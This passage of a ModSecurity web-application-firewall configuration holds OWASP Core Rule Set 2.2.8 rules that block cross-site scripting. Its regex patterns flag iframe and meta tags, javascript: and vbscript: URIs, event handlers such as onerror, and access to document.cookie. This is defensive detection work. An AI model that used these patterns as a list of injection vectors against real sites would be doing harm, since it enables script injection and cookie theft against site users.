"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958028',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\< ?iframe" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958057',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsrc\b\W*?\bjavascript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958031',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<body\b.*?\bbackground\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958006',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsrc\b\W*?\bvbscript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958033',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\btext\b\W*?\becmascript\b" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958038',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonfocus\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958409',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bdocument\b\s*\.\s*\bcookie\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958001',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\<\!\[cdata\[" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958005',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonerror\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958404',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blowsrc\b\W*?\bjavascript:" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958023',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bactivexobject\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958010',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonkeypress\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958411',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonsubmit\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958422',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\bapplication\b\W*?\bx-javascript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958036',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\.addimport\b" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958000',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bhref\b\W*?\bjavascript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958018',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonchange\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958406',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\btext\b\W*?\bjscript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958040',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\balert\b\W*?\(" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958052',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\bapplication\b\W*?\bx-vbscript\b" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958037',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\< ?meta\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958049',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsrc\b\W*?\bhttp:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958030',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\btext\b\W*?\bvbscript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958041',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmouseout\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958416',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blowsrc\b\W*?\bshell:" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958024',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\basfunction:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958059',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmouseover\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958417',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bhref\b\W*?\bvbscript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958020',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 